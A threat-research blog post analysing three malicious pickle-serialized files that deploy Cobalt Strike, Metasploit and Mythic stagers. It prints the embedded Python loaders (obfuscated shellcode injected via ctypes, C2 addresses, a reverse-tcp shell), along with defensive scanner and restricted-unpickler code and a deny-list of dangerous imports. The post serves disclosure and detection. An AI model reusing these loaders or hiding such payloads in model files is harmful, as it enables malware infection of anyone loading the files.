In our previous blog post, “Weaponizing Machine Learning Models with Ransomware”, we uncovered how malware can be surreptitiously embedded in ML models and automatically executed using standard data deserialization libraries – namely pickle.
Shortly after publishing, several people got in touch to see if we had spotted adversaries abusing the pickle format to deploy malware – and as it transpires, we have.
In this supplementary blog, we look at three malicious pickle files used to deploy Cobalt Strike, Metasploit and Mythic respectively, with each uploaded to public repositories in recent months. We provide a brief analysis of these files to show how this attack vector is being actively exploited in the wild.
Cobalt Strike Stager
The first malicious pickle file (serialized with pickle protocol version 3) was uploaded in January 2022 and uses the built-in Python exec function to execute an embedded Python script. The script relies on the ctypes library to invoke Windows APIs such as VirtualAlloc and CreateThread. In this way, it injects and runs a 64-bit Cobalt Strike stager shellcode.
We’ve used a simple pickle “disassembler” based on code from Kaitai Struct (http://formats.kaitai.io/python_pickle/) to highlight the opcodes used to execute each payload:
\x80 proto: 3
\x63 global_opcode: builtins exec
\x71 binput: 0
\x58 binunicode:
    import ctypes,urllib.request,codecs,base64
    AbCCDeBsaaSSfKK2 = "WEhobVkxeDRORGhj" // shellcode, truncated for readability
    AbCCDe = base64.b64decode(base64.b64decode(AbCCDeBsaaSSfKK2))
    AbCCDe =codecs.escape_decode(AbCCDe)
    AbCCDe = bytearray(AbCCDe)
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(AbCCDe)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(AbCCDe)).from_buffer(AbCCDe)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(AbCCDe)))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
\x71 binput: 1
\x85 tuple1
\x71 binput: 2
\x52 reduce
\x71 binput: 3
\x2e stop
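A listing like the one above can be approximated with Python's standard `pickletools` module, which walks the opcode stream without executing it. The following is a minimal sketch, not the Kaitai-based tool we used: the `Harmless` class and the `disassemble` helper are hypothetical names introduced for illustration, and `pickletools` labels the `\x63` opcode `global` rather than `global_opcode`.

```python
import pickle
import pickletools


class Harmless:
    """Benign stand-in: unpickling it would only call print('hello')."""

    def __reduce__(self):
        return (print, ("hello",))


def disassemble(data: bytes) -> list:
    """Return one 'hex-opcode name: argument' line per opcode.

    pickletools.genops only parses the byte stream; nothing is unpickled.
    """
    lines = []
    for opcode, arg, _pos in pickletools.genops(data):
        code = f"\\x{ord(opcode.code):02x}"
        name = opcode.name.lower()
        lines.append(f"{code} {name}" if arg is None else f"{code} {name}: {arg}")
    return lines


# Serialize the benign object with protocol 3, as in the first sample.
sample = pickle.dumps(Harmless(), protocol=3)
listing = disassemble(sample)
print("\n".join(listing))
```

The output follows the same global, string argument, tuple1, reduce, stop shape as the malicious sample, with `builtins print` in place of `builtins exec`.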
The base64-encoded shellcode from this sample connects to https://121.199.68[.]210/Swb1 with a unique User-Agent string: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP09; NP09; MAAU)
The IP address hardcoded in this shellcode appears in various intel feeds in relation to Cobalt Strike activity. Several different Cobalt Strike stagers were spotted communicating with this IP, and a beacon DLL that was hosted there at some point features a watermark associated with many cybercriminal groups, including TrickBot/SmokeLoader, Nobelium, and APT29.
The second sample (serialized using pickle protocol version 4) appeared in the wild in July 2022. It’s rather similar to the first one in the way it uses the ctypes library to load and execute a 32-bit Cobalt Strike stager shellcode.
\x80 proto: 4
\x95 frame: 5397
\x8c short_binunicode: builtins
\x94 memoize
\x8c short_binunicode: exec
\x94 memoize
\x93 stack_global
\x94 memoize
\x58 binunicode:
    import base64
    import ctypes
    import codecs
    shellcode= "" // removed for readability
    shellcode = base64.b64decode(shellcode)
    shellcode = codecs.escape_decode(shellcode)
    shellcode = bytearray(shellcode)
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
\x94 memoize
\x85 tuple1
\x94 memoize
\x52 reduce
\x94 memoize
\x2e stop
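The two listings reach `builtins exec` differently: protocol 3 names it in a single `global` opcode, while protocol 4 pushes the module and attribute as two strings and resolves them with `stack_global`. A static check has to handle both. The sketch below is one possible heuristic built on `pickletools`, not a description of any particular scanner: the `SUSPICIOUS` deny-list, the `find_imports` and `is_suspicious` helpers, and the `Flagged` test class are all hypothetical, and the string tracking assumes the two names are pushed directly before `stack_global` (a pickle that fetches them from the memo would evade it).

```python
import pickle
import pickletools

# Illustrative deny-list only (an assumption, far from exhaustive).
SUSPICIOUS = {
    ("builtins", "exec"),
    ("builtins", "eval"),
    ("os", "system"),
    ("posix", "system"),
    ("nt", "system"),
    ("subprocess", "Popen"),
}

# Opcodes that push a text string onto the pickle stack.
STRING_OPCODES = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def find_imports(data: bytes) -> list:
    """List (module, name) pairs a pickle would import, without loading it."""
    imports, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            # The argument is reported as "module name".
            module, name = arg.split(" ", 1)
            imports.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Heuristic: the last two pushed strings are module and name.
            imports.append((strings[-2], strings[-1]))
        elif opcode.name in STRING_OPCODES:
            strings.append(arg)
    return imports


def is_suspicious(data: bytes) -> bool:
    """True if any import in the pickle is on the deny-list."""
    return any(pair in SUSPICIOUS for pair in find_imports(data))


class Flagged:
    """Test object with an inert payload; it is serialized but never loaded."""

    def __reduce__(self):
        return (exec, ("pass",))


for protocol in (3, 4):
    blob = pickle.dumps(Flagged(), protocol=protocol)
    print(protocol, find_imports(blob), is_suspicious(blob))
```

A deny-list like this only catches the most direct cases, so it is better treated as a triage signal than as proof that a file is safe.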
In this case, the shellcode connects to 43.142.60[.]207:9091/7Iyc with the User-Agent set to Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
The hardcoded IP address was recently mentioned in the Team Cymru report on the Mythic C2 framework. Mythic is a Python-based post-exploitation red teaming platform and an open source alternative to Cobalt Strike. By pivoting on the ETag value that is present in the HTTP headers of Mythic-related requests, Team Cymru researchers were able to find a list of IPs that are likely related to Mythic, and this IP was one of them.
What’s interesting is that just over 4 months ago (August 2022) Mythic introduced a pickle wrapper module that allows for the C2 agent to be injected into a pickle-serialized machine learning model! This means that some pentesting exercises already consider ML models as an attack vector. However, Mythic is known to be used not only in red teaming activities, but also by some notorious cybercriminal groups, and was recently spotted in connection with a 2022 campaign targeting Pakistani and Turkish government institutions, as well as with the spreading of BazarLoader malware.
The third sample appeared under the name favicon.ico in mid-November 2022 and features a bit more obfuscation than the previous two samples. The shellcode injection function is encrypted with AES in ECB mode using the hardcoded key hello_i_4m_cc_12. The shellcode itself is computed using an arithmetic operation on a large integer value and contains a Metasploit reverse-tcp shell that connects to a hardcoded IP 188.8.131.52 on port 6666.
\x80 proto: 3
\x63 global_opcode: builtins exec
\x71 binput: 0
\x58 binunicode:
    import subprocess
    import os
    import time
    from Crypto.Cipher import AES
    import base64
    from Crypto.Util.number import *
    import random
    while True:
        ret = subprocess.run("ping baidu.com -n 1", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if ret.returncode==0:
            key=b'hello_i_4m_cc_12'
            a2=b'p5uzeWCm6STXnHK3 [...]' // truncated for readability
            enc=base64.b64decode(a2)
            ae=AES.new(key,AES.MODE_ECB)
            num2=9287909549576993 [...] // truncated for readability
            num1=(num2//888-777)//666
            buf=long_to_bytes(num1)
            exec(ae.decrypt(enc))
        elif ret.returncode==1:
            time.sleep(60)
\x71 binput: 1
\x85 tuple1
\x71 binput: 2
\x52 reduce
\x71 binput: 3
\x2e stop
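For analysts who want to recover the payload bytes statically, the integer arithmetic in this sample is easy to replay. The sketch below reproduces the `(num2//888-777)//666` step on a harmless placeholder value; it assumes that PyCryptodome's `long_to_bytes` yields the minimal big-endian encoding, which we stand in for with the standard library's `int.to_bytes`. The `int_to_bytes`, `decode_payload` and `encode_placeholder` helpers are hypothetical names, and the real `num2` value (truncated above) is not used.

```python
def int_to_bytes(n: int) -> bytes:
    """Big-endian bytes of a non-negative int (stdlib stand-in for long_to_bytes)."""
    return n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")


def decode_payload(num2: int) -> bytes:
    """Replay the sample's arithmetic, then convert the result to bytes."""
    num1 = (num2 // 888 - 777) // 666
    return int_to_bytes(num1)


def encode_placeholder(data: bytes) -> int:
    """Hypothetical inverse, used here only to build a harmless test value."""
    return (int.from_bytes(data, "big") * 666 + 777) * 888


# Round-trip a benign byte string through the same transformation.
num2 = encode_placeholder(b"not shellcode")
print(decode_payload(num2))  # b'not shellcode'
```

Because the transformation is plain integer division, the bytes can be extracted without running any part of the sample.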
The decrypted injection code is very much the same as observed previously, with Windows APIs being invoked through the ctypes library to inject the payload into executable memory and run it via a new thread.
import ctypes
shellcode = bytearray(buf)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c
The decoded shellcode turns out to be a 64-bit reverse-tcp stager.
The hardcoded IP address is located in China and was acting as a Cobalt Strike C2 server as recently as October 2022, according to multiple Cobalt Strike trackers.
Although we can’t be 100% sure that the described malicious pickle files have been used in real-world attacks (as we lack enough contextual information), our findings show that adversaries are already exploring this attack vector as a method of malware deployment. The IP addresses hardcoded in the above samples have been used in other in-the-wild malware, including various instances of Cobalt Strike and Mythic stagers, suggesting that these pickle-serialized shellcodes were not part of legitimate research or red teaming activity. As some of the post-exploitation and so-called “adversary emulation” frameworks are starting to build support for this attack vector, it’s only a matter of time until we see such attacks on the rise.
We’ve put together a set of YARA rules to detect malicious/suspicious pickle files, which can be found in HiddenLayer’s public BitBucket repository.
For more information on how model injection works, the possible scenarios and consequences, and how to mitigate the risks, check out our detailed blog on Weaponizing Machine Learning Models.
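As one illustration of risk reduction, Python's own pickle documentation describes restricting which globals an unpickler may resolve by overriding `Unpickler.find_class`. The sketch below follows that pattern; the `SAFE_BUILTINS` allow-list, the `restricted_loads` helper and the `Blocked` test class are assumptions chosen for the example. A real ML pipeline would need a carefully reviewed allow-list of framework classes, and this approach does not make pickle safe for untrusted data in general.

```python
import builtins
import io
import pickle

# Illustrative allow-list (an assumption); everything else is rejected.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle asks to import a global.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but refuses globals outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Blocked:
    """Test object whose pickle references builtins.exec with an inert payload."""

    def __reduce__(self):
        return (exec, ("pass",))


print(restricted_loads(pickle.dumps([1, 2, range(3)])))
try:
    restricted_loads(pickle.dumps(Blocked()))
except pickle.UnpicklingError as err:
    print("rejected:", err)
```

The rejection happens when the global is looked up, before the `reduce` opcode could call it, so the embedded payload never runs.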
Indicators of Compromise
| Indicator | Type | Description |
|---|---|---|
| 391f5d0cefba81be3e59e7b029649dfb32ea50f72c4d51663117fdd4d5d1e176 | SHA256 | Cobalt Strike Stager |
| 121.199.68[.]210 | IP | Cobalt Strike Stager |